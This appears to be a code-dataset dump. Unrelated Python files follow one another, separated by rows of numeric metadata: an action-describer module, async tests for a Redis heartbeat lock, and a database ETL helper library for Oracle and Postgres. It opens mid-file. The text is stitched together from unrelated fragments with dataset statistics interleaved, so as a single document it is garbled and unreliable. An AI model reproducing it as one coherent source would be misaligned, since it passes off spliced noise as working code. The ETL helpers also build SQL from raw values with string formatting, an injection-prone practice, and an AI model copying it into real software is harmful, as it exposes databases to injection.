"share_img": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e_600_300.jpg",
"url": "https:\/\/m.sy.soyoung.com\/post\/question?question_id=1"
}
}
}
res = compare_json_construction(d1, d2)
print(res)
| 44.225063
| 472
| 0.38799
| 6,644
| 88,229
| 4.96764
| 0.05298
| 0.072716
| 0.079079
| 0.094895
| 0.985729
| 0.985729
| 0.985729
| 0.984396
| 0.984396
| 0.984396
| 0
| 0.208716
| 0.455927
| 88,229
| 1,994
| 473
| 44.247242
| 0.478553
| 0.00229
| 0
| 0.810178
| 0
| 0.008142
| 0.42483
| 0.266708
| 0
| 0
| 0
| 0
| 0.001527
| 1
| 0.000509
| false
| 0
| 0
| 0
| 0.002036
| 0.001018
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
aca63a285f65dc2a5428dbcdb450af3d0b0fa72c
| 1,478
|
py
|
Python
|
src/compliance/action_describer.py
|
hmrc/platsec-compliance-alerting
|
c12c871a475ec8c2034504799228e565626309b6
|
[
"Apache-2.0"
] | null | null | null |
src/compliance/action_describer.py
|
hmrc/platsec-compliance-alerting
|
c12c871a475ec8c2034504799228e565626309b6
|
[
"Apache-2.0"
] | null | null | null |
src/compliance/action_describer.py
|
hmrc/platsec-compliance-alerting
|
c12c871a475ec8c2034504799228e565626309b6
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import Sequence
from src.data.action import Action
class ActionDescriber(ABC):
@abstractmethod
def describe(self, actions: Sequence[Action]) -> Sequence[str]:
""""""
@abstractmethod
def describe_applied(self, actions: Sequence[Action]) -> Sequence[str]:
""""""
@abstractmethod
def describe_failed(self, actions: Sequence[Action]) -> Sequence[str]:
""""""
class BriefActionDescriber(ActionDescriber):
def describe(self, actions: Sequence[Action]) -> Sequence[str]:
return ", ".join(a.description for a in actions)
def describe_applied(self, actions: Sequence[Action]) -> Sequence[str]:
return ", ".join(a.description for a in actions if a.is_applied())
def describe_failed(self, actions: Sequence[Action]) -> Sequence[str]:
return ", ".join(f"{a.description} ({a.reason})" for a in actions if a.has_failed())
class DetailedActionDescriber(ActionDescriber):
def describe(self, actions: Sequence[Action]) -> Sequence[str]:
return "\n".join(a.detailed_description for a in actions)
def describe_applied(self, actions: Sequence[Action]) -> Sequence[str]:
return "\n".join(a.detailed_description for a in actions if a.is_applied())
def describe_failed(self, actions: Sequence[Action]) -> Sequence[str]:
return "\n".join(f"{a.detailed_description}\nerror: {a.reason}" for a in actions if a.has_failed())
| 36.04878
| 107
| 0.685386
| 182
| 1,478
| 5.494505
| 0.186813
| 0.099
| 0.171
| 0.225
| 0.787
| 0.787
| 0.787
| 0.787
| 0.772
| 0.596
| 0
| 0
| 0.17659
| 1,478
| 40
| 108
| 36.95
| 0.821693
| 0
| 0
| 0.5
| 0
| 0
| 0.056849
| 0.021918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0.125
| 0.25
| 0.875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
acab9832d366b57286f6e462082f3237a579b009
| 82
|
py
|
Python
|
src/chapter31/__init__.py
|
Peefy/CLRS_dugu_code-master
|
98f00e75e1b0ebc13a7affb2604bec8501692a19
|
[
"Apache-2.0"
] | 3
|
2018-01-31T03:08:50.000Z
|
2018-04-25T12:57:01.000Z
|
src/chapter31/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | null | null | null |
src/chapter31/__init__.py
|
HideLakitu/IntroductionToAlgorithm.Python
|
33662f46dc346203b220d7481d1a4439feda05d2
|
[
"Apache-2.0"
] | 3
|
2019-03-03T04:49:53.000Z
|
2020-07-13T10:18:58.000Z
|
# python src/chapter31/chapter31note.py
# python3 src/chapter31/chapter31note.py
| 20.5
| 40
| 0.817073
| 10
| 82
| 6.7
| 0.6
| 0.358209
| 0.746269
| 0.80597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 0.085366
| 82
| 3
| 41
| 27.333333
| 0.773333
| 0.926829
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5aadafb8a71e00148d455e98ea4a699b91cf609
| 4,550
|
py
|
Python
|
tests/test_simple_redis_lock.py
|
fwallacevt/simple-redis-lock
|
171e102c38ed04e3ab268318aa6bbc6459b4aefd
|
[
"MIT"
] | 1
|
2021-04-23T06:41:52.000Z
|
2021-04-23T06:41:52.000Z
|
tests/test_simple_redis_lock.py
|
fwallacevt/simple-redis-lock
|
171e102c38ed04e3ab268318aa6bbc6459b4aefd
|
[
"MIT"
] | null | null | null |
tests/test_simple_redis_lock.py
|
fwallacevt/simple-redis-lock
|
171e102c38ed04e3ab268318aa6bbc6459b4aefd
|
[
"MIT"
] | 1
|
2021-04-25T03:21:02.000Z
|
2021-04-25T03:21:02.000Z
|
#!/usr/bin/env python
"""Tests for `redis-heartbeat-lock` package."""
# pylint: disable=redefined-outer-name
import asyncio
import pytest
from redis_heartbeat_lock import async_lock, context_manager
@pytest.mark.asyncio
async def test_raises_if_exception_occurs():
"""Tests that if an exception occurs during the block, we get that exception."""
# First, build our redis client and heartbeat manager...
redis = await async_lock.AsyncLock.create(
key="test_raises_if_exception_occurs",
url="redis://127.0.0.1:6379",
lock_acquisition_timeout=2.0,
lock_expiry=2,
)
heartbeat = context_manager.ContextManager(period=1.0, redis=redis)
with pytest.raises(
Exception, match=r"Failed!",
):
async with heartbeat as _:
raise Exception(f"Failed!")
assert heartbeat.future.done() is True
assert heartbeat.future.cancelled() is True
assert await redis.exists() == 0
@pytest.mark.asyncio
async def test_cleans_up_if_nothing_happens():
"""Tests that if we do nothing, the heartbeat is cleaned up."""
# First, build our redis client and heartbeat manager...
redis = await async_lock.AsyncLock.create(
key="test_cleans_up_if_nothing_happens",
url="redis://127.0.0.1:6379",
lock_acquisition_timeout=2.0,
lock_expiry=2,
)
heartbeat = context_manager.ContextManager(period=1.0, redis=redis)
async with heartbeat as _:
pass
assert heartbeat.future.done() is True
assert heartbeat.future.cancelled() is True
assert await redis.exists() == 0
@pytest.mark.asyncio
async def test_can_run_things_in_the_foreground():
"""Tests that we can run tasks while running the heartbeat."""
# First, build our redis client and heartbeat manager...
redis = await async_lock.AsyncLock.create(
key="test_can_run_things_in_the_foreground",
url="redis://127.0.0.1:6379",
lock_acquisition_timeout=2.0,
lock_expiry=2,
)
heartbeat = context_manager.ContextManager(period=1.0, redis=redis)
async with heartbeat as _:
await asyncio.sleep(5)
print("Did some stuff!")
assert heartbeat.future.done() is True
assert heartbeat.future.cancelled() is True
assert await redis.exists() == 0
@pytest.mark.asyncio
async def test_gets_lock():
"""Tests that the heartbeat actually grabs the lock correctly."""
# First, build our redis client and heartbeat manager...
redis = await async_lock.AsyncLock.create(
key="test_gets_lock",
url="redis://127.0.0.1:6379",
lock_acquisition_timeout=2.0,
lock_expiry=4,
)
heartbeat = context_manager.ContextManager(period=1.0, redis=redis)
async with heartbeat as _:
lock = await redis.set_lock(True, True)
assert lock == False
assert await redis.exists() == 0
@pytest.mark.asyncio
async def test_errors_if_lock_is_acquired():
"""Tests that the heartbeat errors if someone else has the lock."""
# First, build our redis client and heartbeat manager...
redis = await async_lock.AsyncLock.create(
key="test_errors_if_lock_is_acquired",
url="redis://127.0.0.1:6379",
lock_acquisition_timeout=2.0,
lock_expiry=8,
)
lock = await redis.set_lock(True, True)
assert lock == True
heartbeat = context_manager.ContextManager(period=1.0, redis=redis)
with pytest.raises(
Exception, match=r"Failed to get lock",
):
async with heartbeat as _:
pass
assert await redis.exists() == 1
@pytest.mark.asyncio
async def test_holds_lock():
"""Tests that the heartbeat holds the lock for longer than initial expiry."""
# First, build our redis client and heartbeat manager...
redis = await async_lock.AsyncLock.create(
key="test_holds_lock",
url="redis://127.0.0.1:6379",
lock_acquisition_timeout=2.0,
lock_expiry=4,
)
heartbeat = context_manager.ContextManager(period=2.0, redis=redis)
async with heartbeat as _:
lock = await redis.set_lock(True, True)
assert lock == False
# Should still have the lock after another five seconds
await asyncio.sleep(5)
lock = await redis.set_lock(True, True)
assert lock == False
# Should still have the lock after another five seconds
await asyncio.sleep(5)
lock = await redis.set_lock(True, True)
assert lock == False
assert await redis.exists() == 0
| 30.536913
| 84
| 0.672747
| 615
| 4,550
| 4.826016
| 0.188618
| 0.037062
| 0.034367
| 0.044474
| 0.815027
| 0.782682
| 0.720687
| 0.702493
| 0.702493
| 0.689353
| 0
| 0.028077
| 0.225055
| 4,550
| 148
| 85
| 30.743243
| 0.81367
| 0.118022
| 0
| 0.704082
| 0
| 0
| 0.094866
| 0.073661
| 0
| 0
| 0
| 0
| 0.173469
| 1
| 0
| false
| 0.020408
| 0.030612
| 0
| 0.030612
| 0.010204
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5bc902e49cfa923bbb69f6eb59d03d8dd8d1273
| 88,473
|
py
|
Python
|
fusetools/db_etl_tools.py
|
fusecloud/fusetools
|
4352d0beebd4d676b8578a1f96977553d3ebf28c
|
[
"MIT"
] | 6
|
2021-01-05T17:45:01.000Z
|
2021-01-06T16:25:50.000Z
|
fusetools/db_etl_tools.py
|
fusecloud/fusetools
|
4352d0beebd4d676b8578a1f96977553d3ebf28c
|
[
"MIT"
] | 2
|
2021-01-09T23:25:04.000Z
|
2021-01-09T23:26:07.000Z
|
fusetools/db_etl_tools.py
|
fusecloud/fusetools
|
4352d0beebd4d676b8578a1f96977553d3ebf28c
|
[
"MIT"
] | 1
|
2021-09-02T00:24:03.000Z
|
2021-09-02T00:24:03.000Z
|
"""
Database connections and engines.
|pic1| |pic2| |pic3| |pic4|
.. |pic1| image:: ../images_source/db_etl_tools/oracle1.png
:width: 20%
.. |pic2| image:: ../images_source/db_etl_tools/postgres1.png
:width: 20%
.. |pic3| image:: ../images_source/db_etl_tools/teradata.png
:width: 20%
.. |pic4| image:: ../images_source/db_etl_tools/redshift1.png
:width: 20%
"""
from datetime import datetime
import os
import re
import time
import cx_Oracle
import numpy as np
import pandas as pd
import psycopg2
from colorama import Fore
from sqlalchemy import text
import psycopg2.extras
from fusetools.text_tools import Export
class Generic:
"""
Generic functions for SQL queries and ETL.
"""
@classmethod
def make_groupby(cls, sql, dim_fact_delim):
"""
Creates a dynmaically generated GROUP BY clause for a given SQL statement.
:param sql: SQL statement provided.
:param dim_fact_delim: Delimiter between selected columns.
:return: A complete SQL statement with dynamically generated GROUP BY clause.
"""
dim_segs_ = []
for idxx, d in enumerate(sql.replace("\n", "").split("SELECT")[1].split(dim_fact_delim)[0].split(", ")):
if d.strip() != '':
dim_segs_.append(d.split(" as ")[1].strip())
sql_all = sql + " GROUP BY " + ', '.join(dim_segs_)
sql_all = sql_all.replace("\n", " ").replace('"', "")
return sql_all
@classmethod
def make_db_schema(cls, df):
"""
Creates a mapping of Pandas data types to SQL data types.
:param df: A Pandas DataFrame with column types to be converted.
:return: A Pandas DataFrame of columns with corresponding SQL data types.
"""
cols = []
dtypes = []
for col in df.columns:
cols.append(col)
col_series = df[col].replace(r'^\s*$', np.nan, regex=True)
col_series = col_series.dropna()
try:
date_len = max(col_series.astype("str").str[:10].str.split("-").apply(lambda x: len(x)))
if date_len == 3:
dtypes.append("datetime64[ns]")
continue
except:
date_len = 0
try:
if col_series.astype("float").apply(float.is_integer).all():
int = True
else:
int = False
except:
dtypes.append("object")
continue
if int and date_len != 3:
dtype = "Int64"
elif not int and date_len != 3:
dtype = "float"
elif date_len == 3:
dtype = "datetime64[ns]"
else:
dtype = "object"
dtypes.append(dtype)
schema_df = pd.DataFrame({"col": cols, "dtype_new": dtypes})
old_schema_df = pd.DataFrame(df.dtypes, columns=["dtype_old"]).reset_index()
schema_df2 = pd.merge(schema_df, old_schema_df, how="inner", left_on="col", right_on="index")
schema_df2['dtype_final'] = np.where(
schema_df2['dtype_new'] != "object",
schema_df2['dtype_new'],
schema_df2['dtype_old']
)
return schema_df2
@classmethod
def db_apply_schema(cls, df, schema_df):
"""
Converts Pandas DataFrame columns based on schema DataFrame provided.
:param df: A Pandas DataFrame with column types to be converted.
:param schema_df: A Pandas DataFrame of columns with corresponding SQL data types.
:return: Pandas DataFrame with columns converted to SQL schema.
"""
df_ret = df
df_ret = df_ret.replace(r'^\s*$', np.nan, regex=True)
df_ret = df_ret.replace('', np.nan, regex=True)
df_ret = df_ret.replace({pd.np.nan: None})
for idx, row in schema_df.iterrows():
if row['dtype_final'] == "Int64":
df_ret[row['col']] = df_ret[row['col']].replace({pd.np.nan: None})
df_ret[row['col']] = df_ret[row['col']].astype(float).astype("Int64")
elif row['dtype_final'] == "datetime64[ns]":
df_ret[row['col']] = pd.to_datetime(df_ret[row['col']], errors="coerce")
else:
df_ret[row['col']] = df_ret[row['col']].replace({pd.np.nan: None})
df_ret[row['col']] = df_ret[row['col']].astype(row['dtype_final'])
return df_ret
@classmethod
def make_db_cols(cls, df):
"""
Returns a Pandas DataFrame column names that are converted for database standards.
:param df: A Pandas DataFrame with columns to be transformed
:return: Pandas DataFrame column names that are converted for database standards.
"""
columns = [re.sub('#', 'num', col) for col in df.columns]
columns = [re.sub('%', 'pct', col) for col in columns]
columns = [re.sub('[^a-zA-Z0-9]+', ' ', col) for col in columns]
columns = [col.replace(" ", "_") for col in columns]
columns = [col[:200] for col in columns]
columns = [col.lower() for col in columns]
columns = [c.lstrip("_").rstrip("_") for c in columns]
df.columns = columns
return df
@classmethod
def run_query(cls, engine, sql):
"""
Executes a SQL query.
:param engine: A database engine object.
:param sql: A SQL statement to be executed.
:return: Time for execution of SQL query.
"""
rptg_tstart = datetime.now()
engine.execute(sql)
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
class Oracle:
"""
Generic functions for Oracle SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/oracle1.png
"""
@classmethod
def make_tbl(cls, df, tbl_name):
"""
Provides a CREATE TABLE SQL statement for a given Pandas DataFrame.
:param df: A Pandas DataFrame to be added as an Oracle table.
:param tbl_name: Oracle table name to be created.
:return: CREATE TABLE SQL statement.
"""
for idx, col in enumerate(df):
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
if idx == 0:
col_desc_all = [col_desc]
else:
col_desc_all.append(col_desc)
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = col_desc_all['char'].str.split('-', 1).str
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
d = {'object': 'VARCHAR',
'int64': 'NUMBER',
'float64': 'VARCHAR',
'datetime64[ns]': 'VARCHAR'}
col_desc_all = col_desc_all.replace(d)
col_desc_all['concat'] = np.where(col_desc_all['type'] != "NUMBER",
col_desc_all['column'] + " " + col_desc_all['type'] + "(" + col_desc_all[
'length'] + ")",
col_desc_all['column'] + " " + col_desc_all['type'])
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def insert_tbl(cls, df, tbl_name):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame.
:param df: A Pandas DataFrame with values to be inserted.
:param tbl_name: An Oracle table for Pandas DataFrame to be inserted into.
:return: SQL for INSERT INTO statement.
"""
sql = 'INSERT INTO ' + tbl_name + '(' + ', '.join(df.columns) + ') VALUES (' + ''.join(
[':' + str(v) + ', ' for v in list(range(1, len(df.columns)))]) + ':' + str(len(df.columns)) + ')'
return sql
@classmethod
def insert_exec(cls, sql, conn, df):
"""
Executes a provided SQL statement.
:param sql: A provided SQL query.
:param conn: A database connection.
:param df: A Pandas DataFrame.
:return: Nothing.
"""
cursor = cx_Oracle.Cursor(conn)
cursor.prepare(sql)
cursor.executemany(None, df.values.tolist())
conn.commit()
cursor.close()
# conn.close()
@classmethod
def make_tbl_complete_force(cls, df, tbl_name, eng, conn, attempt_n,
subcols=False, chunks=False, chunks_delay=False):
"""
Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.
:param df: Pandas DataFrame to create a table from.
:param tbl_name: Name of table to be created.
:param eng: Oracle database engine object.
:param conn: Oracle database connection object.
:param attempt_n: Number of times to attempt to run INSERT statement.
:param subcols: A list of columns of the Pandas DataFrame to apply operations on.
:param chunks: Number of chunks to split Pandas DataFrame into.
:param chunks_delay: Delay between chunk's INSERT statement.
:return: Print statements outline sequential SQL statements executed.
"""
if len(df) > 0:
if subcols:
df = df[subcols]
df.fillna(' ', inplace=True)
df = df.astype(str)
# make create table sql
sql = cls.make_tbl(df, tbl_name)
print(sql)
# drop table
try:
eng.execute("drop table " + str(tbl_name))
except Exception as e:
print(str(e))
pass
# create table
eng.execute(sql)
# split large df into chunks
if chunks:
df_split = np.array_split(df, chunks)
for sub in df_split:
# make insert table sql
sql = cls.insert_tbl(sub, tbl_name)
print(sql)
# execute insert statement
# add try counter
attempts = attempt_n
while attempts > 0:
try:
cls.insert_exec(sql, conn, sub)
except:
attempts -= 1
print(Fore.RED + f"Failed upload attempt...{attempts} remaining.")
time.sleep(1)
if chunks_delay:
time.sleep(chunks_delay)
else:
time.sleep(2)
else:
# make insert table sql
sql = cls.insert_tbl(df, tbl_name)
print(sql)
# execute insert statement
cls.insert_exec(sql, conn, df)
@classmethod
def make_tbl_complete(cls, df, tbl_name, eng, conn, subcols=False, chunks=False, chunks_delay=False):
"""
Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.
:param df: Pandas DataFrame to create a table from.
:param tbl_name: Name of table to be created.
:param eng: Oracle database engine object.
:param conn: Oracle database connection object.
:param subcols: A list of columns of the Pandas DataFrame to apply operations on.
:param chunks: Number of chunks to split Pandas DataFrame into.
:param chunks_delay: Delay between chunk's INSERT statement.
:return: Print statements outline sequential SQL statements executed.
"""
if len(df) > 0:
if subcols:
df = df[subcols]
df.fillna(' ', inplace=True)
df = df.astype(str)
# make create table sql
sql = cls.make_tbl(df, tbl_name)
print(sql)
# drop table
try:
eng.execute("drop table " + str(tbl_name))
except:
pass
# create table
eng.execute(sql)
# split large df into chunks
if chunks:
df_split = np.array_split(df, chunks)
for sub in df_split:
# make insert table sql
sql = cls.insert_tbl(sub, tbl_name)
print(sql)
# execute insert statement
cls.insert_exec(sql, conn, sub)
if chunks_delay:
time.sleep(chunks_delay)
else:
time.sleep(2)
else:
# make insert table sql
sql = cls.insert_tbl(df, tbl_name)
print(sql)
# execute insert statement
cls.insert_exec(sql, conn, df)
@classmethod
def get_oracle_date(cls, date):
"""
Converts a date to an Oracle date of format "DD-MMM-YYY"
:param date: A provided date.
:return: An Oracle database date.
"""
# given a datetime YYYY-MM-DD
if "-" in date:
year, month, day = str(pd.to_datetime(date)).split("-")
year = year[2:]
day = day.replace(" 00:00:00", "")
month_name = {
'01': 'JAN',
'02': 'FEB',
'03': 'MAR',
'04': 'APR',
'05': 'MAY',
'06': 'JUN',
'07': 'JUL',
'08': 'AUG',
'09': 'SEP',
'10': 'OCT',
'11': 'NOV',
'12': 'DEC'}
month = month_name.get(month)
date = day + "-" + month + "-" + year
# given an excel date
elif "/" in date:
date = str(pd.to_datetime(date)).replace(" 00:00:00", "")
year, month, day = str(pd.to_datetime(date)).split("-")
year = year[2:]
day = day.replace(" 00:00:00", "")
month_name = {
'01': 'JAN',
'02': 'FEB',
'03': 'MAR',
'04': 'APR',
'05': 'MAY',
'06': 'JUN',
'07': 'JUL',
'08': 'AUG',
'09': 'SEP',
'10': 'OCT',
'11': 'NOV',
'12': 'DEC'}
month = month_name.get(month)
date = day + "-" + month + "-" + year
return date
@classmethod
def get_orcl_date(cls, dat):
"""
Converts a date to an Oracle date of format "DD-MMM-YYY".
:param dat: A provided date column of a Pandas Series.
:return: An Oracle database date.
"""
dat['mon'] = dat.dt.month
dat['day'] = dat.dt.day
# .astype(str).str.pad(width=2, fillchar="0", side="left")
dat['year'] = dat.dt.year
mon_abbrevs = {
1: 'JAN',
2: 'FEB',
3: 'MAR',
4: 'APR',
5: 'MAY',
6: 'JUN',
7: 'JUL',
8: 'AUG',
9: 'SEP',
10: 'OCT',
11: 'NOV',
12: 'DEC'}
dat['mon_abbrevs'] = \
dat['mon'].map(mon_abbrevs)
dat['day'] = dat['day'].str[:-2]
dat['year'] = dat['year'].astype(str).str[:4]
dat['year'] = dat['year'].astype(str).str[-2:]
dat['date_comb'] = \
dat['day'].astype(str) + "-" + dat['mon_abbrevs'].astype(str) + "-" + dat['year'].astype(str)
return dat['date_comb']
@classmethod
def orcl_tbl_varchar_convert(cls, tbl_name, convert_cols, engine):
"""
Converts a set of columns to VARCHAR(300) for a given Oracle table.
:param tbl_name: Oracle table name.
:param convert_cols: List of columns to convert.
:param engine: Oracle database engine.
:return: Printed ALTER table statements for each column.
"""
# loop through
for col in convert_cols:
sql = f'''
alter table {tbl_name}
modify {col} varchar(300)
'''
print(sql)
engine.execute(text(sql).execution_options(autocommit=True))
time.sleep(1)
class Postgres:
"""
Generic functions for Postgres SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/postgres1.png
"""
@classmethod
def run_query_pg(cls, conn, sql):
"""
Executes a SQL statement with a Postgres database connection.
:param conn: Postgres database connection object,
:param sql: SQL Statement to execute.
:return: Elapsed time to execute query.
"""
rptg_tstart = datetime.now()
cur = conn.cursor()
cur.execute(sql)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def insert_val_pg(cls, col_list, val_list, tbl_name):
"""
Creates SQL to run an INSERT operation of a given Postgres table.
:param col_list: List of columns to INSERT or UPDATE.
:param val_list: List of values to INSERT or UPDATE.
:param tbl_name: Name of Postgres table.
:return: SQL to run an INSERT statement.
"""
sql = f'''
INSERT INTO {tbl_name}
(
{str(col_list).replace("[", "").replace("]", "").replace("'", "")}
) values (
{str(val_list).replace("[", "").replace("]", "")}
)
'''
return sql
@classmethod
def upsert_val_pg(cls, col_list, val_list, tbl_name, constraint_col):
"""
Creates SQL to run an UPSERT (INSERT new records or UPDATE existing records) operation of a given Postgres table.
:param col_list: List of columns to INSERT or UPDATE.
:param val_list: List of values to INSERT or UPDATE.
:param constraint_col: Column/value logic to check against for INSERT or UPDATE.
:param tbl_name: Name of Postgres table.
:return: SQL to run an UPSERT statement.
"""
update = ""
for idx, col in zip(col_list, val_list):
update = update + idx + f"='{col}',"
update = update[:update.rfind(",")]
sql = f'''
INSERT INTO {tbl_name}
({str(col_list).replace("[", "").replace("]", "").replace("'", "")})
VALUES
({str(val_list).replace("[", "").replace("]", "")})
ON CONFLICT ({constraint_col})
DO
UPDATE SET
{update}
'''
return sql
@classmethod
def upsert_tbl_pg(cls, src_tbl, tgt_tbl, src_join_cols, src_insert_cols,
src_update_cols=False, update_compare_cols=False):
"""
Creates SQL to run an UPSERT (INSERT new records or UPDATE existing records) operation of a given Postgres table.
:param src_tbl: Postgres source table that contains data to be merged from.
:param tgt_tbl: Postgres target table to receive UPSERT operation.
:param src_join_cols: Columns to use to join source and target tables.
:param src_insert_cols: Columns to be inserted from source table.
:param src_update_cols: Columns to be updated from source table.
:param update_compare_cols: Columns to use to compare values across source and target tables.
:return: A SQL Insert statement and a SQL Update statement.
"""
src_join_cols_ = (
str([f"t.{c} = s.{c} AND "
for c in src_join_cols])
.replace("[", "")
.replace("]", "")
.replace("'", "")
.replace(",", "")
)
src_join_cols_ = src_join_cols_[:src_join_cols_.rfind("AND")]
src_join_cols_f = (
str([f"t.{c} IS NULL AND "
for c in src_join_cols])
.replace("[", "")
.replace("]", "")
.replace("'", "")
.replace(",", "")
)
src_join_cols_f = src_join_cols_f[:src_join_cols_f.rfind("AND")]
src_insert_cols_ = (
str([f"s.{c}"
for c in src_insert_cols])
.replace("[", "")
.replace("]", "")
.replace("'", "")
)
if src_update_cols:
src_update_cols_ = (
str([f"{c} = s.{c},"
for c in src_update_cols])
.replace("[", "")
.replace("]", "")
.replace("', '", "")
.replace("'", "")
)
src_update_cols_ = src_update_cols_[:src_update_cols_.rfind(",")]
# update join statement
src_join_cols2_ = src_join_cols_.replace("t.", f"{tgt_tbl}.")
if update_compare_cols:
update_compare_cols_ = (
str([f"s.{c} != {tgt_tbl}.{c},"
for c in update_compare_cols])
.replace("[", "")
.replace("]", "")
.replace("', '", "")
.replace("'", "")
)
update_compare_cols_ = update_compare_cols_[:update_compare_cols_.rfind(",")]
src_join_cols2_ = src_join_cols2_ + " AND " + update_compare_cols_
# src_join_cols2_ = src_join_cols2_.replace("t.", f"{tgt_tbl}.")
# https://dwgeek.com/amazon-redshift-merge-statement-alternative-and-example.html/
sql_update = f'''
/* Update records*/
UPDATE {tgt_tbl}
SET {src_update_cols_}
FROM {src_tbl} s
WHERE {src_join_cols2_}
'''.replace("\n", " ")
else:
sql_update = ""
sql_insert = f'''
/* Insert records*/
INSERT INTO {tgt_tbl}
SELECT {src_insert_cols_}
FROM {src_tbl} s
LEFT JOIN {tgt_tbl} t
ON {src_join_cols_}
WHERE {src_join_cols_f}
'''.replace("\n", " ")
return sql_update, sql_insert
@classmethod
def make_df_tbl_pg(cls, tbl_name, df):
"""
Creates SQL to run a CREATE TABLE statement based on a Pandas DataFrame.
:param tbl_name: Postgres table name.
:param df: Pandas DataFrame.
:return: CREATE TABLE SQL statement.
"""
# fix columns
df = Generic.make_db_cols(df)
# loop thru the columns
for idx, col in enumerate(df):
# find the max length of each field
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
# find the max value of each fields
try:
col_max = col + "-" + str(max(df[col]))
except:
col_max = col + "-" + 'NA'
if idx == 0:
col_desc_all = [col_desc]
col_max_all = [col_max]
else:
col_desc_all.append(col_desc)
col_max_all.append(col_max)
# make df of column lengths
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = \
col_desc_all['char'].str.split('-', 1).str
# make df of column max
col_max_all = pd.DataFrame(col_max_all)
col_max_all.columns = ["char"]
col_max_all['column'], col_max_all['max'] = \
col_max_all['char'].str.split('-', 1).str
# make df of column dtypes
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
# join dfs
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
col_desc_all = pd.merge(
col_desc_all,
col_max_all[["column", "max"]],
how="inner",
on="column")
# define data type mapping (pandas --> teradata)
d = {'object': 'VARCHAR',
'int64': 'INTEGER',
'Int64': 'INTEGER',
'int32': 'INTEGER',
'bool': 'VARCHAR',
'float64': 'FLOAT',
'datetime64[ns]': 'TIMESTAMP',
"datetime64[ns, UTC]": "TIMESTAMP"}
col_desc_all = col_desc_all.astype(str).replace(d)
# list the columns where you want to specify the lengths
col_desc_all['concat'] = np.where(
# if varchar, use the length of the longest char
col_desc_all['type'] == "VARCHAR",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str) + \
"(" + col_desc_all['length'] + ")",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str))
# convert integers with a max val over certain amount to varchar
for idx, row in col_desc_all.iterrows():
if str(row['type']) == 'INTEGER' and row['max'] != "nan" and int(row['max']) > 2147483647:
val = row['concat']
col_desc_all.loc[idx, 'concat'] = \
val.replace(
" INTEGER",
f" VARCHAR({row['length']})")
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def insert_df_pg(cls, cursor, conn, df, tbl_name):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame into a Postgres table..
:param cursor: Postgres database cursor object.
:param conn: Postgres database connection object.
:param df: Pandas DataFrame to insert into a Postgres table.
:param tbl_name: Postgres table name.
:return: Elapsed time to execute query.
"""
df_load = df.replace({pd.np.nan: None})
df_load = df_load.round(3)
df_columns = list(df_load)
